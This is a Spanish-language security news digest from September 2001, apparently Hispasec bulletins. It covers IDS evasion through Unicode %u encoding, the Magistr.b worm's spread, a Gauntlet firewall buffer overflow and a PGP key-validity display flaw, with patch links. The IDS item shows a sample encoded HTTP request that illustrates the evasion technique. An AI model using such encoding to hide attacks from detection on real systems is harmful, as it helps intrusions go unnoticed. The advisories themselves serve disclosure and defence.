http://lists2.suse.com/archive/suse-security/2001-Aug/0264.html

[suse-security] in.telnetd for 7.0
http://lists2.suse.com/archive/suse-security/2001-Aug/0484.html



miércoles, 5 de septiembre de 2001

Vulnerabilidad en múltiples sistemas de detección de intrusos

Se ha descubierto una vulnerabilidad en múltiples sistemas de detección
de intrusos tanto comerciales como open-source que puede permitir a los
atacantes evadir la detección.
Unicode proporciona un estándar para representar caracteres
internacionales mediante la asignación de un número único para cada
carácter. Esto abarca el repertorio de caracteres de los conjuntos más
empleados como ASCII, ANSI, ISO-8859, cirílico, griego, chino, japonés y
coreano. La codificación unicode de caracteres ASCII puede emplearse
para ocultar la apariencia de una petición HTTP, manteniendo toda sus
funcionalidades.

Esto permite a los atacantes camuflar el payload empleado en un exploit
y evadir la detección. La primera de las principales vulnerabilidades
fue documentada contra Microsoft Internet Information Server (IIS) en
octubre del año 2000. Esta vulnerabilidad permitía a los atacantes
codificar los caracteres "/", "\" y "." como su equivalente en unicode y
traspasar los mecanismos de seguridad de IIS para bloquear la escalada
de directorios.

La codificación unicode puede emplearse para evadir la detección de los
sistemas de detección de intrusos debido a un fallo en Microsoft IIS que
acepta e interpreta caracteres unicode no estándar.

Ejemplo:

La siguiente petición HTML, corresponde a un GET realizado de forma
estándar:

GET /attack.html HTTP/1.0

La siguiente muestra la misma petición, mediante una petición igualmente
válida, pero con la representación de carácter unicode en lugar de la
letra k:

GET /attac%u006b.html HTTP/1.0

Esta petición emplea una forma no estándar de Unicode, conocida como
"codificación %u". Este tipo de codificación puede emplearse de forma
efectiva para sortear múltiples firmas de IDS para vulnerabilidades
específicas para sistemas IIS.

Este problema afecta a los siguientes productos afectados:

Cisco Secure Intrusion Detection System
(conocido como NetRanger, componente Sensor)
Cisco Catalyst 6000 Intrusion Detection System Module
Dragon Sensor 4.x
ISS RealSecure Network Sensor 5.x y 6.x anterior a XPU 3.2
ISS RealSecure Server Sensor 6.0 para Windows
ISS RealSecure Server Sensor 5.5 para Windows
Snort anterior a 1.8.1

ISS X-Force ha incluido un parche para esta vulnerabilidad en RealSecure
Network Sensor X-Press Update 3.2, que puede descargarse de
http://www.iss.net/db_data/xpu/RS.php

Las actualizaciones para los productos ISS afectados pueden descargarse
de:

http://www.iss.net/eval/eval.php

BlackICE no está afectado por este problema.

En Cisco Secure Intrusion Detection System Sensor esta vulnerabilidad
queda reparada con el service pack 3.0(2)S6 para dicho producto, que
será incluido en todas las versiones posteriores. Este service pack
esta actualmente en fase BETA hasta que la fase de pruebas quede
completada; sin embargo, debido a notificación pública de la
vulnerabilidad Cisco ofrece el parche para descarga en la siguiente
dirección:
ftp://ftp-eng.cisco.com/csids-sig-updates/ServicePacks/IDSk9-sp-3.0-1.42-S6-0.42-.bin



Para el módulo de detección de intrusos de los Cisco Catalyst 6000
esta vulnerabilidad quedará reparada con el service pack 3.0. La
detección de esta forma de esconder los ataques será incluida en la
versión 3.0 que será publicada en octubre de este año.

Dragon Sensor 4.x también se ve afectado por el problema, sin
embargo ya están disponibles las firmas para detectar esta nueva
forma de codificar los ataques. Por su parte Snort 1.8.1 corrige
este problema que afecta a las versiones anteriores del producto.




Antonio Ropero
antonior@hispasec.com


Más información:

Alerta ISS (Internet Security Systems):
http://www.eeye.com/html/Research/Advisories/AD20010705.html

Aviso de seguridad de Cisco:
http://www.cisco.com/warp/public/707/cisco-intrusion-detection-obfuscation-vuln-pub.shtml

Dragon Sensor:
http://dragon.enterasys.com

Snort:
http://snort.sourcefire.com/



martes, 4 de septiembre de 2001

Magistr.b sigue extendiéndose

Cómo ya avisábamos el martes en una-al-dia y en nuestro servicio de
alerta por SMS a través de MyAlert, la nueva versión del virus/gusano
Magistr se propaga con especial incidencia. El problema se agrava
si se tiene en cuenta que aun son muchos antivirus, incluso algunos
de los más utilizados, los que aun son incapaces de detectar y
desinfectar a esta nueva variante.
Como muestra un botón, en el momento de escribir estas líneas, 6 de
septiembre 3:00 madrugada hora española, McAfee aun no detecta a
Magistr.b (lo hará en su próxima actualización DAT 4158, no disponible
aun), tampoco lo hace Trend Micro (lo hará en el Pattern File 935).
Después nos encontramos con un buen número de antivirus que realizan
su trabajo a medias, incluyendo detección pero no desinfección
(Sophos, Norman, Norton, etc). En una próxima entrega comunicaremos
los resultados al enfrentar a todos los antivirus contra un equipo
infectado con este virus.

Si en las primeras horas fueron muchas casas antivirus las que
tacharon a Magistr.b de riesgo bajo por su escasa propagación, tal
vez en un intento de justificar el que no tuvieran aun la vacuna, ya
no se puede negar la evidencia. En estos momentos, incluso las casas
que aun no tienen ninguna solución disponible para sus usuarios, lo
tienen catalogado como alerta media en sus webs.

Lo triste de esta situación es que algunos centros y sitios webs
dedicados a informar sobre los virus se han dejado arrastrar por la
corriente inicial y han obviado alertar sobre el peligro real que
representa este espécimen. A día de hoy, en Hispasec recibimos
de forma intermitente muestras de Magistr.b que el propio virus
envía de forma automática desde los sistemas que logra infectar,
un indicador más de que la propagación continúa.

AVP fue el primer antivirus en detectar a Magistr.b, incluso unas
horas antes de nuestro aviso inicial realizado el martes, si bien
un problema puntual en los servidores de actualización en Rusia (de
la casa matriz) impidió durante las primeras horas que los usuarios
pudieran realizar la descarga de forma correcta. Esto explica que en
ese primer aviso que emitimos, y tras comprobar las muestras de las
que disponíamos (facilitadas por RedIRIS) contra todos los productos
recién actualizados, indicamos que aun no lo reconocía ningún
antivirus. Este problema fue exclusivo de los servidores rusos, y
no afectó a los usuarios que actualizan el producto desde los
sitios mantenidos por los distribuidores de otros países.

Panda Software, que posteriormente a nuestro aviso incluyó la
actualización para sus usuarios, ha publicado una herramienta
gratuita para detectar y eliminar a Magistr.b. Esta herramienta se
ha comportado de forma correcta en unas pruebas que hemos realizado
contra muestras reales, y puede ser descargada desde la dirección:

http://updates.pandasoftware.com/magistr.b/pqremove.com



Bernardo Quintero
bernardo@hispasec.com


Más información:

Servicio de Alertas vía SMS Hispasec-Myalert (gratis)
http://www.hispasec.com/alertasms.htm

RedIRIS
http://www.rediris.es/mail/resaca

Última hora: Nueva y peligrosa versión de Magistr
http://www.hispasec.com/unaaldia.asp?id=1042

Alerta: Magistr, un virus/gusano sofisticado y muy destructivo
http://www.hispasec.com/unaaldia.asp?id=872

Análisis del polifacético y peligroso Magistr
http://www.hispasec.com/unaaldia.asp?id=878

Magistr sigue activo
http://www.hispasec.com/unaaldia.asp?id=921

Virus "Magistr.b" - Una peligrosa herencia
http://www.avp-es.com/virus/magistrb.html

W32/Magistr.b@MM
http://vil.mcafee.com/dispVirus.asp?virus_k=99199&

W32/Magistr.B
http://www.norman.no/virus_info/w32_magistr_b.shtml

W32.Magistr.39921@mm
http://www.symantec.com/avcenter/venc/data/w32.magistr.39921@mm.html

W32/Magistr.B@mm
http://service.pandasoftware.es/enciclopedia/ficha.jsp?Virus=W32/Magistr.B@mm

W32/Magistr-B
http://service.pandasoftware.es/enciclopedia/ficha.jsp?Virus=W32/Magistr.B@mm

PE_MAGISTR.B
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_MAGISTR.B



lunes, 3 de septiembre de 2001

Desbordamiento de búfer en Gaunlet Firewall

Se ha descubierto una vulnerabilidad de desbordamiento de búfer en el
firewall Gaunlet para Unix y en WebShield CSMAP que puede ser explotada
por un usuario remoto para conseguir nivel de usuario para acceder al
sistema.
La vulnerabilidad consistente en un desbordamiento de búfer reside en
los demonios smap/smapd y CSMAP. Estos demonios son responsables del
tratamiento de las transacciones de mensajes e-mail tanto para entrada
como para la salida de estos. Si un atacante logra explotar esta
vulnerabilidad podrá ejecutar cualquier comando shell con los mismos
privilegios que el usuario del correspondiente demonio.

La vulnerabilidad en los demonios smap/smapd afecta a los siguientes
productos:
Gauntlet para Unix versiones 5.x
PGP e-ppliance serie 300 versión 1.0
McAfee e-ppliance series 100 y 120

La vulnerabilidad relacionada con CSMAP afecta a los productos:
Gauntlet para Unix versión 6.0
PGP e-ppliance serie 300 versiones 1.5 y 2.0
PGP e-ppliance serie 1000 versiones 1.5 y 2.0
McAfee WebShield para Solaris v4.1

Network Associates ha publicado un parche para paliar los efectos de
esta vulnerabilidad que se encuentra disponible en las direcciones:

ftp://ftp.nai.com/pub/security/
http://www.pgp.com/naicommon/download/upgrade/upgrades-patch.asp



Antonio Ropero
antonior@hispasec.com


Más información:

PGP Security:
http://www.pgp.com/support/product-advisories/csmap.asp



domingo, 2 de septiembre de 2001

Vulnerabilidad en visualización de llaves firmadas en PGP

Un error en la visualización del interfaz gráfico de PGP puede
provocar que llaves falsas aparezcan como firmadas y como totalmente
válidas.
Se ha descubierto una vulnerabilidad en la visualización de la validez
de las claves en PGP que puede ser empleada por un atacante para engañar
a los usuarios haciéndoles creer que se ha creado una firma válida. Si
el atacante puede obtener una firma de su clave de una tercera parte
confiable, puede entonces añadir un segundo ID de usuario sin firmar
a su llave. El atacante deberá cambiar el falso identificador sin
firmar como primario y convencer a la víctima para situar la llave
en su anillo de llaves.

En este caso algunas visualizaciones en PGP no identifican de forma
adecuada el falso usuario mostrándolo como válido. Siempre que PGP
muestre la información de validez de forma individual de cada usuario
en concreto, la información es correcta. De esta forma, si el usuario
examina los identificadores de usuario para todas las llaves públicas
que importe en sus anillos advertirá de forma inmediata el problema.

Este error ha sido corregido para que PGP muestre los identificadores
sin firmar como no válidos. Se encuentran disponibles actualizaciones
para los siguientes productos:

PGP Corporate Desktop v7.1 (Win32)
PGP Personal Security v7.0.3 (Win32)
PGP Freeware v7.0.3 (Win32)
PGP E-Business Server v7.1 (Solaris/HPUX/Win32)
PGP E-Business Server v7.0.4 (Solaris/HPUX/Win32)
Todas las actualizaciones pueden descargarse de la dirección:
http://www.pgp.com/naicommon/download/upgrade/upgrades-patch.asp




Antonio Ropero
antonior@hispasec.com


Más información:

PGP.com:
http://www.pgp.com/support/product-advisories/pgpsdk.asp